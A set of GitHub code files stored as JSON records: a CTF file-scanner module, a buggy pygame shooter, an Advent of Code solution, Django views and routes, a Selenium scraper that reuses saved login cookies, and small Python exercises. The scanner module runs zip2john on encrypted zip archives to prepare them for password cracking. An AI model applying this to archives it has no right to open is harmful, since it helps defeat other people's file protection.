''\r\n\r\n\tcmd3 =\"\"\"\r\nif zipdetails %s | grep -q Encryption; then\r\n zip2john %s > %s;\r\n %s\r\nfi\r\n\"\"\"[1:-1]%(config['path'],config['path'],path2,more)\r\n\r\n\t[execmd(c) for c in (cmd1,cmd2,cmd3)]\r\n\t\r\n\tresult_path = [p for p in (path1,path2,path3) if path.exists(p)]\r\n\t\r\n\treturn {\"type\":\"file\",\"path\":result_path,\"content\":\"\"}\r\n\r\n#####################\r\n# \"config\": \r\n#####################\r\n# env_dir : Directory Created for the scanned filed\r\n# system_tp : linux/windows\r\n# path : File path\r\n# json : Json response required (optional)\r\n# quiet : Use quiet mode ? 
(optional)\r\n# password : Password provided (optional)\r\n# iv : Iv provided (hex) (optional)\r\n# formatflag : Format flag (optional)\r\n# module : Module selected (optional)","repo_name":"Vozec/CTFilesScan","sub_path":"modules/other_zip.py","file_name":"other_zip.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2875320341","text":"# Pygame Boilerplate\n# Author: Tyler\n\n\nimport random\nimport time\nimport pygame\nimport pygame.sprite\n\npygame.init()\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBGCOLOUR = (100, 100, 255)\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_SIZE = (SCREEN_WIDTH, SCREEN_HEIGHT)\nWINDOW_TITLE = \"<<Collecting Blocks>>\"\n\n\nclass Player(pygame.sprite.Sprite):\n \"\"\"Describes a player object\n A subclass of pygame.sprite.Sprite\n\n Attributes:\n image: Surface that is the visual\n representation of or Block\n rect: numerical representation of\n our Block [x, y, width, height]\n hp: describe how much health our\n player has\n \"\"\"\n\n def __init__(self) -> None:\n # Call the superclass constructor\n super().__init__()\n\n # Create the image of the block\n self.image = pygame.image.load(\"./images/charizard.png\")\n\n # Resize the image (scale)\n self.image = pygame.transform.scale(self.image, (42, 42))\n\n self.rect = self.image.get_rect()\n\n # Initial health points\n self.hp = 100\n\n def hp_remaining(self) -> int:\n \"\"\"Return the percent of health remaining\"\"\"\n return self.hp / 100\n\n\nclass Enemy(pygame.sprite.Sprite):\n \"\"\"The enemy sprites\n\n Attributes:\n image: Surface that is the visual representation\n rect: Rect (x, y, width, height)\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.image = pygame.image.load(\"./images/spaceinvaders.png\")\n # Resize the image (scale)\n self.image = pygame.transform.scale(self.image, (56, 40))\n\n self.rect = self.image.get_rect()\n # Define the initial location\n self.rect.x, self.rect.y = (\n random.randrange(SCREEN_WIDTH),\n random.randrange(SCREEN_HEIGHT)\n )\n\n # Define the initial velocity\n self.x_vel = random.choice([-4, -3, 3, -4])\n self.y_vel = random.choice([-4, -3, 3, -4])\n\n def update(self) -> None:\n \"\"\"Calculate movement\"\"\"\n self.rect.x += self.x_vel\n self.rect.y += self.y_vel\n\n # Constrain movement\n # X -\n if self.rect.left < 0:\n self.rect.x = 0\n self.x_vel = -self.x_vel # bounce\n\n if self.rect.right > SCREEN_WIDTH:\n self.rect.right > SCREEN_WIDTH\n self.x_vel = -self.x_vel # bounce\n # y -\n if self.rect.y < 0:\n self.rect.y = 0\n self.y_vel = -self.y_vel # bounce\n if self.rect.bottom > SCREEN_HEIGHT:\n self.rect.bottom > SCREEN_HEIGHT\n self.y_vel = -self.y_vel # bounce\n\n\nclass Bullet(pygame.sprite.Sprite):\n \"\"\"Bullet\n\n Attributes:\n image: visual representation\n rect: mathematical representation\n vel_y: y velocity in px/sec\n \"\"\"\n\n def __init__(self, coords: tuple):\n \"\"\"\n\n Arguments:\n coords: tuple of (x, y) to represent initial location\n \"\"\"\n super().__init__()\n\n self.image = pygame.Surface((5, 10))\n self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n\n # Set the middle of the bullet to be at coords\n self.rect.center = coords\n\n self.vel_y = 5\n\n def update(self):\n self.rect.y -= self.vel_y\n\nclass Superbullet(pygame.sprite.Sprite):\n \"\"\"Superbullet\n\n Attributes:\n image: visual representation\n rect: mathematical 
representation\n        vel_y: y velocity in px/sec\n    \"\"\"\n\n    def __init__(self, coords: tuple):\n        \"\"\"\n\n        Arguments:\n            coords: tuple of (x, y) to represent initial location\n        \"\"\"\n        super().__init__()\n\n        self.image = pygame.Surface((8, 20))\n        self.image.fill(RED)\n        self.rect = self.image.get_rect()\n\n        # Set the middle of the bullet to be at coords\n        self.rect.center = coords\n\n        self.vel_y = 4\n\n    def update(self):\n        self.rect.y -= self.vel_y\n\n\ndef main() -> None:\n    \"\"\"Driver of the Python script\"\"\"\n    # Create the screen\n    screen = pygame.display.set_mode(SCREEN_SIZE)\n    pygame.display.set_caption(WINDOW_TITLE)\n\n    # Create some local variables that describe the environment\n    done = False\n    clock = pygame.time.Clock()\n    score = 0\n    num_enemies = 15\n    time_start = time.time()\n    time_invincible = 3\n    game_state = \"running\"\n    time_ended = time.time()\n    time_cooldown = 4\n    super_bulletnumber = 1\n\n    # Check for high score\n    with open(\"./data/shootemup_highscore.txt\") as f:\n        high_score = int(f.readline().strip())\n\n    endgame_messages = {\n        \"win\": \"Congratulations, you won!\",\n        \"lose\": \"Sorry, they got you. Play again!\"\n    }\n\n    font = pygame.font.SysFont(\"Georgia\", 25)\n\n    pygame.mouse.set_visible(False)\n\n    # Create groups to hold sprites\n    all_sprites = pygame.sprite.Group()\n    enemy_sprites = pygame.sprite.Group()\n    bullet_sprites = pygame.sprite.Group()\n\n    # Create the Player block\n    player = Player()\n    # Add the player to all sprites group\n    all_sprites.add(player)\n\n    # ----------- MAIN LOOP\n    while not done:\n        # ----------- EVENT LISTENER\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                done = True\n            if event.type == pygame.MOUSEBUTTONUP:\n                if len(bullet_sprites) < 3 and time.time() - time_start > time_invincible:\n                    bullet = Bullet(player.rect.midtop)\n                    # Add it to the allsprites group\n                    all_sprites.add(bullet)\n                    bullet_sprites.add(bullet)\n\n            if pygame.key.get_pressed([pygame.K_SPACE]):\n                # Do something for the keyboard\n                if len(super_bullet) < 1 and time.time() - time.start > time_invincible:\n                    super_bullet = Superbullet(player.rect.midtop)\n                    all_sprites.add(bullet)\n                    super_bullet.add(bullet)\n                pass\n\n        # LOSE CONDITION - Player hp goes below 0\n        if player.hp_remaining() <= 0:\n            done = True\n        # ----------- CHANGE ENVIRONMENT\n        # Process player movement based on mouse pos\n        mouse_pos = pygame.mouse.get_pos()\n        player.rect.x, player.rect.y = mouse_pos\n\n        # Check nu,ber of enemies currently on the screen\n        if len(enemy_sprites) < 1:\n            # Create enemy sprites\n            for i in range(num_enemies):\n                enemy = Enemy()\n\n                # Set a random location for the enemy inside the screen\n                enemy.rect.x = random.randrange(SCREEN_WIDTH - enemy.rect.width)\n                enemy.rect.y = random.randrange(SCREEN_HEIGHT - enemy.rect.height)\n\n                # Add the enemy to the enemy_sprites Group\n                # Add the enemy to the all_sprites Group\n                enemy_sprites.add(enemy)\n                all_sprites.add(enemy)\n\n            num_enemies += 5\n            if player.hp <= 80:\n                player.hp += 20\n            super_bulletnumber += 1\n\n        # Update the location of all the sprites (blocks, player)\n        if game_state == 'running':\n            enemy_sprites.update()\n            bullet_sprites.update()\n            player.update()\n\n        # Check all collisions between player and enemies\n        enemy_collided = pygame.sprite.spritecollide(player, enemy_sprites, False)\n\n        # Set a time for invincibility at start of game\n        if time.time() - time_start > time_invincible:\n            if game_state == \"running\":\n                for enemy in enemy_collided:\n                    player.hp -= 1\n                    print(player.hp) # debugging\n\n            elif game_state == 
\"won\":\n                for enemy in enemy_collided:\n                    player.hp - 0\n\n        # Check bullet collisions with enemies\n        # Kill the bullets when they've left the screen\n        for bullet in bullet_sprites:\n            enemies_bullet_collided = pygame.sprite.spritecollide(\n                bullet,\n                enemy_sprites,\n                True\n            )\n\n            # If the bullet has struck some enemy\n            if len(enemies_bullet_collided) > 0:\n                bullet.kill()\n                score += 1\n\n            if bullet.rect.y < 0:\n                bullet.kill()\n\n        for super_bullet in bullet_sprites:\n            enemies_bullet_collided = pygame.sprite.spritecollide(\n                super_bullet,\n                enemy_sprites,\n                True\n            )\n\n            # If the bullet has struck some enemy\n            if enemies_bullet_collided:\n                score += 1\n\n            if bullet.rect.y < 0:\n                bullet.kill()\n\n        # ----------- DRAW THE ENVIRONMENT\n        screen.fill(BGCOLOUR) # fill with bgcolor\n\n        # Draw all sprites\n        all_sprites.draw(screen)\n\n        # Draw the score on the screen\n        screen.blit(\n            font.render(f\"Score: {score}\", True, BLACK),\n            (5, 5)\n        )\n        # Draw the high score on the screen\n        screen.blit(\n            font.render(f\"High Score: {high_score}\", True, BLACK),\n            (5, 30)\n        )\n\n        # Draw a health bar\n        # Draw the background rectangle\n        pygame.draw.rect(screen, GREEN, [580, 5, 215, 20])\n        # Draw the foreground rectangle which represents the remaining health\n        life_remaining = 215 - int(215 * player.hp_remaining())\n        pygame.draw.rect(screen, BLACK, [580, 5, life_remaining, 20])\n\n        # If we've won, draw the text on the screen\n        if game_state == \"won\":\n            screen.blit(\n                font.render(endgame_messages[\"win\"], True, BLACK),\n                (SCREEN_WIDTH / 3, SCREEN_HEIGHT / 2)\n            )\n        if game_state == \"lose\":\n            screen.blit(\n                font.render(endgame_messages[\"lose\"], True, BLACK),\n                (SCREEN_WIDTH / 3, SCREEN_HEIGHT / 2)\n            )\n\n        # Update the screen\n        pygame.display.flip()\n\n        # ----------- CLOCK TICK\n        clock.tick(75)\n\n    # Clean-up\n\n    # Update the high score if the current score is the highest\n    with open(\"./data/shootemup_highscore.txt\", \"w\") as f:\n        if score > high_score:\n            f.write(str(score))\n        else:\n            f.write(str(high_score))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"DrKelp0/problem-set-1","sub_path":"shootemup.py","file_name":"shootemup.py","file_ext":"py","file_size_in_byte":10380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"30236991654","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 30 18:14:15 2022\n\n@author: shavak\n\"\"\"\n\ninput_file = \"input.txt\"\nN = 50\nA = \"\"\nD = {}\nx_min = 0\nx_max = 0\ny_min = 0\ny_max = 0\ninfinite_light = False\n\ndef is_exterior(x, y):\n    return x <= x_min or x >= x_max or y <= y_min or y >= y_max\n\ndef is_lit(x, y):\n    if (x, y) in D:\n        return True\n    if infinite_light and is_exterior(x, y):\n        return True\n    return False\n\ndef algorithm_index(x, y):\n    ans = 0\n    for v in range(y + 1, y - 2, -1):\n        for u in range(x - 1, x + 2):\n            ans = 2 * ans + is_lit(u, v)\n    return ans\n\ndef enhance_image():\n    global D\n    global x_min\n    global x_max\n    global y_min\n    global y_max\n    global infinite_light\n    E = {}\n    for x in range(x_min, x_max + 1):\n        for y in range(y_min, y_max + 1):\n            i = algorithm_index(x, y)\n            if A[i] == \"#\":\n                E[(x, y)] = 1\n    D = E\n    x_min -= 1\n    x_max += 1\n    y_min -= 1\n    y_max += 1\n    if infinite_light:\n        infinite_light = A[-1] == \"#\"\n    else:\n        infinite_light = A[0] == \"#\"\n    \ndef num_lit_pixels():\n    if infinite_light:\n        return float(\"inf\")\n    return len(D)\n    \nwith open(input_file, \"r\") as f:\n    A = f.readline().strip()\n    line = f.readline()\n    line = 
f.readline()\n x = 0\n y = 0\n while line:\n l = len(line) - 1\n x = 0\n while x < l:\n if line[x] == '#':\n D[(x, y)] = 1\n x += 1\n y -= 1\n line = f.readline()\nx_min = -1\nx_max = x\ny_min = y\ny_max = 1\nfor i in range(N):\n enhance_image()\nprint(\"\\nNumber of lit pixels = {}.\".format(len(D)))","repo_name":"shavak/advent_of_code","sub_path":"2021/Day_20/day_20.py","file_name":"day_20.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70030407160","text":"from crispy_forms.helper import FormHelper\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models, transaction\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import detail, edit\n\n\nclass ModelFormWithInlinesView(\n edit.SingleObjectTemplateResponseMixin, edit.ModelFormMixin, edit.ProcessFormView\n):\n template_name_suffix = \"_form\"\n inlines = {}\n\n def get_inline(self, prefix, cls):\n kwargs = {\n \"prefix\": prefix,\n \"instance\": self.object,\n }\n\n if self.request.method in (\"POST\", \"PUT\"):\n kwargs.update(\n {\"data\": self.request.POST, \"files\": self.request.FILES,}\n )\n\n return cls(**kwargs)\n\n def get_inlines(self):\n return {\n f\"{key}_formset\": self.get_inline(key, cls)\n for key, cls in self.inlines.items()\n }\n\n def get_formset_helper(self):\n helper = FormHelper()\n helper.form_tag = False\n helper.disable_csrf = True\n helper.use_custom_control = False\n helper.template = \"bootstrap4/table_inline_formset.html\"\n return helper\n\n def get_context_data(self, **kwargs):\n kwargs.update(\n {\"formset_helper\": self.get_formset_helper(), \"inlines\": self.get_inlines()}\n )\n return super().get_context_data(**kwargs)\n\n @transaction.atomic\n def form_valid(self, form, inlines={}):\n response = super().form_valid(form)\n\n for inline in inlines.values():\n inline.instance = self.object\n inline.save()\n\n return response\n\n def form_invalid(self, form, inlines={}):\n \"\"\"If the form is invalid, render the invalid form and formsets.\"\"\"\n return self.render_to_response(self.get_context_data(form=form, **inlines,))\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n Handle POST requests: instantiate the form and formset instances with the passed\n POST variables and then check if it's valid.\n \"\"\"\n form = self.get_form()\n inlines = self.get_inlines()\n if form.is_valid() and all(inline.is_valid() for inline in inlines.values()):\n return self.form_valid(form, inlines)\n else:\n return self.form_invalid(form, inlines)\n\n\nclass DuplicateView(detail.SingleObjectTemplateResponseMixin, detail.BaseDetailView):\n \"\"\"Provide the ability to duplicate objects.\"\"\"\n\n template_name_suffix = \"_confirm_duplicate\"\n success_url = None\n\n def clone_relations(self, target):\n source = self.get_object()\n\n for rel in source._meta.get_fields():\n if rel.many_to_many and rel.concrete:\n ThroughModel = rel.remote_field.through\n field_name = rel.m2m_field_name()\n filter = {field_name: source.pk}\n for obj in ThroughModel.objects.filter(**filter).all():\n obj.pk = None\n setattr(obj, field_name, target)\n obj.save(force_insert=True)\n\n @transaction.atomic\n def duplicate(self, request, *args, **kwargs):\n \"\"\"\n Call the duplicate() method on the fetched object and then redirect to the\n success URL.\n \"\"\"\n self.object = self.get_object()\n\n self.object.pk = None\n self.object.save(force_insert=True)\n\n 
self.clone_relations(self.object)\n\n success_url = self.get_success_url()\n\n return HttpResponseRedirect(success_url)\n\n def post(self, request, *args, **kwargs):\n return self.duplicate(request, *args, **kwargs)\n\n def get_success_url(self):\n \"\"\"Return the URL to redirect to after processing a valid form.\"\"\"\n if self.success_url:\n url = self.success_url.format(**self.object.__dict__)\n else:\n try:\n url = self.object.get_absolute_url()\n except AttributeError:\n raise ImproperlyConfigured(\n \"No URL to redirect to. Either provide a url or define\"\n \" a get_absolute_url method on the Model.\"\n )\n return url\n\n\nclass MixinObjectPageTitle:\n def get_context_data(self, **kwargs):\n if hasattr(self, \"object\"):\n kwargs[\"page_title\"] = str(self.object)\n\n return super().get_context_data(**kwargs)\n","repo_name":"cmulders/eefbakt-recipes","sub_path":"utils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"560777089","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom clinician import views\n\nrouter = DefaultRouter()\n\nclinician_viewset = views.ClinicianViewset.as_view({'get': 'list', 'post': 'create'})\n\navailable_slots_list = views.ClinicianAvailabilityViewset.as_view({'get': 'list', 'post': 'create'})\navailable_slot_details = views.ClinicianAvailabilityViewset.as_view({'get': 'retrieve'})\n\nbook_clinician_availability = views.BookClinicianAvailabilityViewset.as_view({'post': 'create', 'get': 'list'})\n\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(r\"clinicians/\", clinician_viewset),\n path(r\"clinicians/<str:clinician_id>/available-slots/\", available_slots_list, name=\"available_slots_list\"),\n path(r\"clinicians/<str:clinician_id>/available-slots/<str:availability_id>/\", available_slot_details, name=\"available_slot_details\"),\n path(r\"clinicians/<str:clinician_id>/bookings/\", book_clinician_availability, name=\"book_clinician_availability\"),\n]","repo_name":"suvhotta/clinician-booking-app","sub_path":"clinician/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41235094314","text":"orang = {\n\t'nama': 'Linus Torvald',\n\t'tahun lahir': 1969,\n\t'warga negara': 'Finlandia'\n}\n\nfor kunci in orang:\n\tprint(\"{}: {}\".format(kunci, orang[kunci]))\n\n\nframework = {\n\t'nama': 'Django',\n\t'bahasa': 'Python',\n\t'tahun lahir': 2005,\n\t'versi': '1.9.6'\n}\nprint(\"\\n\\n\")\nfor f in framework:\n\tprint(\"{}: {}\".format(f, framework[f]))","repo_name":"codesyariah122/MyPython","sub_path":"looping/for/lat5.py","file_name":"lat5.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"id","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"16838314162","text":"import time\nimport pickle\nimport datetime\nimport pprint\nimport csv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# from sheet import work\n# driver = webdriver.Chrome()\n\n\ndef setup_login():\n 
driver.wait = WebDriverWait(driver, 10)\n driver.get(\"https://opstra.definedge.com\")\n # # get cookie\n #\n # with open('cookie.txt', 'wb') as fp:\n # pickle.dump(driver.get_cookies(), fp)\n with open('cookie.txt', 'rb') as fp:\n loadedCookie = pickle.load(fp)\n for cookie in loadedCookie:\n # print(cookie)\n try:\n cookie['expiry'] = round(cookie['expiry'])\n except:\n pass\n driver.add_cookie(cookie)\n driver.get(\"https://opstra.definedge.com/options-simulator\")\n driver.wait.until(EC.title_contains(\"Options Simulator\"))\n # driver.wait.until(EC.presence_of_element_located(\n # (By.CSS_SELECTOR, \"span.chip__content > a.black--text\")))\n\n\ndef next_week(old_date):\n new_date = old_date + datetime.timedelta(7)\n return new_date\n\n\nmonth_to_int = {\n \"Jan\": 1, \"Feb\": 2, \"Mar\": 3, \"Apr\": 4, \"May\": 5, \"Jun\": 6, \"Jul\": 7, \"Aug\": 8, \"Sep\": 9, \"Oct\": 10, \"Nov\": 11, \"Dec\": 12\n}\nint_to_month = {\n 1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", 7: \"Jul\", 8: \"Aug\", 9: \"Sep\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"\n}\n\n\ndef select_date_in_datepicker(current_date):\n # click date input\n driver.wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"div.v-menu > div > div > div > div > div> input\"))).click()\n time.sleep(0.5)\n # click month header;\n # click year header;\n for i in range(0, 2):\n driver.find_element_by_css_selector(\n \"div.v-date-picker-header__value > div > button\").click()\n time.sleep(0.5)\n # find and click year\n years = driver.find_elements_by_css_selector(\"ul.v-date-picker-years > li\")\n for i in range(0, len(years)):\n if int(years[i].get_attribute(\"innerHTML\")) == current_date.year:\n # print(current_date.year)\n years[i].click()\n break\n time.sleep(0.5)\n # find and click month\n months = driver.find_element_by_css_selector(\n \"div.v-date-picker-table.v-date-picker-table--month.theme--light > table > tbody\")\n months = months.find_elements_by_class_name(\"v-btn__content\")\n for i in range(0, len(months)):\n if month_to_int[months[i].get_attribute(\"innerHTML\")] == current_date.month:\n months[i].click()\n break\n time.sleep(0.5)\n # find and click day\n days = driver.find_element_by_css_selector(\n \"div.v-date-picker-table.v-date-picker-table--date.theme--light > table > tbody\")\n days = days.find_elements_by_class_name(\"v-btn__content\")\n for i in range(0, len(days)):\n if int(days[i].get_attribute(\"innerHTML\")) == current_date.day:\n days[i].click()\n break\n time.sleep(0.5)\n return\n\n\ndef select_stock(stock_name):\n driver.wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"div.layout.fluid.row.wrap.ma-3 > div > div > div.v-input__control\"))).click()\n # collect all stock names\n stocks = driver.wait.until(EC.presence_of_all_elements_located(\n (By.CSS_SELECTOR, \"div.v-select-list.v-card.theme--light > div > div > a > div > div.v-list__tile__title\")))\n # search stocks list\n for i in range(0, len(stocks)):\n if stocks[i].get_attribute(\"innerHTML\") == stock_name:\n stocks[i].click()\n break\n return\n\n\ndef datetime_to_expiry_string(current_date):\n new_day = str(current_date.day) if current_date.day > 9 else (\n \"0\" + str(current_date.day))\n string_date = new_day + \\\n int_to_month[current_date.month].upper() + str(current_date.year)\n return string_date\n\n\ndef select_expiry_date(current_date):\n driver.wait.until(EC.presence_of_all_elements_located(\n (By.CSS_SELECTOR, \"div.layout.fluid.row.wrap.ma-3 > div > div > 
div.v-input__control\")))[1].click()\n # driver.find_elements_by_css_selector(\n # \"div.layout.fluid.row.wrap.ma-3 > div > div > div.v-input__control\")[1].click()\n # third_div = driver.wait.until(EC.presence_of_element_located(\n # (By.CSS_SELECTOR, \"div.v-menu__content.theme--light.menuable__content__active.v-autocomplete__content > div.v-select-list.v-card.theme--light\"))).find_elements_by_css_selector(\"div\")[2]\n # scroll to show all values\n driver.execute_script(\n 'list = document.querySelector(\"div.v-menu__content.theme--light.menuable__content__active.v-autocomplete__content\"); let oldHeight = 0; while (oldHeight != list.scrollHeight) {oldHeight = list.scrollHeight; list.scrollTo(0, list.scrollHeight); }')\n expiry_dates = driver.wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"div.v-menu__content.theme--light.menuable__content__active.v-autocomplete__content > div.v-select-list.v-card.theme--light > div\"))).find_elements_by_css_selector(\"div.v-list__tile__title\")\n # expiry_dates = driver.find_elements_by_css_selector(\"div.v-select-list.v-card.theme--light\")[\n # 1].find_elements_by_css_selector(\"div.v-list__tile__title\")\n dest_expiry = datetime_to_expiry_string(current_date)\n print(dest_expiry)\n for i in range(0, len(expiry_dates)):\n print(expiry_dates[i].get_attribute(\"innerHTML\"))\n if expiry_dates[i].get_attribute(\"innerHTML\") == dest_expiry:\n expiry_dates[i].click()\n break\n return\n\n\ndef display_all_rows():\n driver.find_element_by_css_selector(\n \"div.v-datatable__actions__select > div > div\").click()\n rows = driver.find_elements_by_css_selector(\n \"div.v-select-list.v-card.theme--light > div.v-list.theme--light\")[0].find_elements_by_class_name(\"v-list__tile__title\")\n for i in range(0, len(rows)):\n if rows[i].get_attribute(\"innerHTML\") == \"All\":\n rows[i].click()\n return\n\n\ndef fetch_table():\n table_rows = driver.find_elements_by_css_selector(\n \"table.v-datatable.v-table.theme--light > tbody > tr\")\n spot_price = driver.find_element_by_css_selector(\n \"div.layout.fluid.row.wrap.ma-3 > div > span.v-chip.v-chip--label.theme--light.green.lighten-4 > span\").get_attribute(\"innerHTML\").split(\": \")[1].split(\"\\n\")[0]\n datetime_str = driver.find_element_by_css_selector(\n \"div.flex.title.text-xs-center.xs12.md2.mt-2.mr-2\").get_attribute(\"innerHTML\").strip().split()\n table = []\n for i in range(0, len(table_rows)):\n row = []\n table_columns = table_rows[i].find_elements_by_css_selector(\"td\")\n row.append(table_columns[1].get_attribute(\"innerHTML\"))\n row.append(table_columns[2].get_attribute(\"innerHTML\"))\n a = table_columns[3].get_attribute(\"innerHTML\")\n # # with delta sign\n # row.append(a[0:a.find(\"<\")] + a[a.find(\">\")+1:a.rfind(\"<\")])\n # row.append(table_columns[4].get_attribute(\"innerHTML\"))\n # a = table_columns[5].get_attribute(\"innerHTML\")\n # row.append(a[0:a.find(\"<\")] + a[a.find(\">\")+1:a.rfind(\"<\")])\n # without delta sign\n row.append(a[0:a.find(\"<\")])\n row.append(table_columns[4].get_attribute(\"innerHTML\"))\n a = table_columns[5].get_attribute(\"innerHTML\")\n row.append(a[0:a.find(\"<\")])\n row.append(table_columns[6].get_attribute(\"innerHTML\"))\n row.append(table_columns[7].get_attribute(\"innerHTML\"))\n row.append(datetime_str[0])\n row.append(datetime_str[1])\n row.append(spot_price)\n # append date, time, spot price\n table.append(row)\n return table\n\n\n# CallLTP, CallIV, CallDelta, Strikes, PutDelta, PutIV, PutLTP, Date, Time, Spotprice\n\n\ndef 
save_to_csv(array_2D):\n with open(\"array.csv\", \"a\") as my_csv:\n newarray = csv.writer(my_csv, delimiter=',')\n newarray.writerows(array_2D)\n return\n\n\ndef click_5_min():\n driver.find_element_by_css_selector(\n \"div.layout.row.wrap.justify-space-around.fill-height.hidden-sm-and-down\").find_elements_by_css_selector(\"button\")[4].click()\n return\n\n\ndef get_option_chain():\n driver.find_element_by_css_selector(\n \"div.layout.justify-end > button > div.v-btn__content\").click()\n return\n\n\ndef wait_for_load():\n # driver.find_element_by_css_selector(\n # \"div.vld-overlay.is-active.is-full-page\")\n print(\"waiting....\")\n time.sleep(0.5)\n while driver.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.vld-overlay\"))).get_attribute(\"style\") != \"display: none;\":\n # while driver.wait.until(EC.presence_of_element_located(\n # (By.XPATH, \"/html/body/div/div[21]/main/div/div/div/div/div[2]/div[1]\"))).get_attribute(\"style\") == \"display: none;\":\n # print(\".\")\n continue\n time.sleep(0.5)\n print(\"continue\")\n return\n\n\ndef loop(start_date, end_date):\n current_date = datetime.date.fromisoformat(start_date)\n # compare datepicker's selected date\n # datepicker_date = driver.find_element_by_css_selector(\n # \"div.v-menu > div > div > div > div > div> input\").get_attribute(\"value\").split(\"-\")\n select_stock(\"BANKNIFTY\")\n wait_for_load()\n # while current_date < end_date\n while current_date <= datetime.date.fromisoformat(end_date):\n select_date_in_datepicker(current_date)\n wait_for_load()\n select_expiry_date(current_date)\n wait_for_load()\n for i in range(0, 74):\n # <-------fetch stats-------->\n display_all_rows()\n table = fetch_table()\n # plug in sheet\n work(current_date.isoformat(), table)\n # go next\n try:\n click_5_min()\n get_option_chain()\n wait_for_load()\n except:\n pass\n current_date = next_week(current_date)\n pass\n\n\ndef csv_loop():\n for i in range(0, 74):\n get_option_chain()\n wait_for_load()\n save_to_csv(fetch_table())\n click_5_min()\n\n\n# if __name__ == \"__main__\":\n# start_date = \"2020-03-12\"\n# end_date = \"2020-03-26\"\n# wait_for_load()\n# loop(start_date, end_date)\n","repo_name":"mario8192/opstra-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74528340281","text":"computers = {\n 'HP' : 20,\n 'DELL' : 50,\n 'MACBOOK' : 12,\n 'ASUS' : 30,\n}\n\n# print('the number of MACBOOK computer is:', computers['MACBOOK'])\n\n# computer_type = input('enter type of computer: ').upper()\n# print('the number of', computer_type, 'computer is: ', computers[computer_type])\n\n# new_computer = input(\"enter new type of computer: \").upper()\n# number = input('enter the number of it: ')\n# computers[new_computer] = number\n# print(computers)\ncomputers['TOSHIBA'] = 50\ncomputers['DELL'] = 10\ncomputers['MACBOOK'] = 2\ncomputers['FUJITSU'] = 15\ncomputers['ALIENWARE'] = 5\nprint(computers)\nsum = 0\nfor k, v in computers.items():\n sum = sum + v\nprint('the total number of computers is', sum, 'computers')\n\nprice = {\n 'HP' : 600,\n 'DELL' : 650,\n 'MACBOOK' : 12000,\n 'ASUS' : 400,\n 'ACER' : 350,\n 'TOSHIBA' : 600,\n 'FUJITSU' : 900,\n 'ALIENWARE' : 1000,\n}\nprint(price)\n# # print(price['ASUS'])\n# comp_price = input('enter a type of computer: ').upper()\n# print('the price of that computer is:', price[comp_price])\n\n# comp = input('enter a type of computer: 
').upper()\n# number = int(input('enter the number of computers you wanna buy: '))\n# price_comp = price[comp]*number\n# print('the total price is', price_comp)\n\n# comp = input('eneter a computer type: ').upper()\n# number = int(input('enter the number of computers you wanna buy: '))\n\n#Sep\n# comp_number = input('enter a computer type and the number: ').upper()\n# a = comp_number.split(':')\n# comp = a[0]\n# number = int(a[1])\n# computers[comp] = computers[comp] - number\n# print('the maintain', comp, 'computer is', computers[comp])\n# print(computers)\n\ntotal_price = 0\nfor a,b in zip(computers.values(), price.values()):\n c = a * b\n print(c)\n total_price += c\nprint('the total price is', total_price)","repo_name":"duybui2905/C4T-13","sub_path":"session11/computers.py","file_name":"computers.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14042529914","text":"import pygame\n\nclass Ship():\n def __init__(self,ai_settings,screen):\n \"\"\"initialisation of ship and setting its start position\"\"\"\n self.screen = screen\n self.ai_settings = ai_settings\n\n #load ship image and get rectangle form image\"\"\"\n self.image = pygame.image.load('images/ship.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n #Start each new ship at the bottom center of screen\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n self.center = float(self.rect.centerx)\n\n #Movement flag\n self.moving_right = False\n self.moving_left = False\n\n def update(self):\n \"\"\"Update the ship's postition based on the movement flag\"\"\"\n #update ships center value. not the rect.\n if self.moving_right and self.rect.right < self.screen_rect.right:\n self.center += self.ai_settings.ship_speed_factor\n if 